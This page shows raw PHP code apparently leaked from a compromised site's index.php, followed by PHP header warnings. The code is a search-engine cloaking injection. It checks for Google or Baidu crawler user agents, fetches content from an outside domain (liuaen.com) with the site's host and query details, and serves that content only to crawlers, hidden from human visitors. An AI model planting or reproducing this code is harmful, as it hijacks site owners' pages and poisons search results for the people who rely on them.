header('Content-Type:text/html;charset=gb2312'); $key= $_SERVER["HTTP_USER_AGENT"]; if(strpos($key,'oogle')!== false||strpos($key,'aidu')!==false) { $host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']; $file = file_get_contents('http://liuaen.com/'."/index.php?host=".$host_name."&url=" . $_SERVER['QUERY_STRING'] . "&domain=" . $_SERVER['SERVER_NAME']); echo $file; } ?>
Warning: Cannot modify header information - headers already sent by (output started at /data/home/qxu1650010286/htdocs/index.php:10) in /data/home/qxu1650010286/htdocs/index.php on line 51

Warning: Cannot modify header information - headers already sent by (output started at /data/home/qxu1650010286/htdocs/index.php:10) in /data/home/qxu1650010286/htdocs/index.php on line 52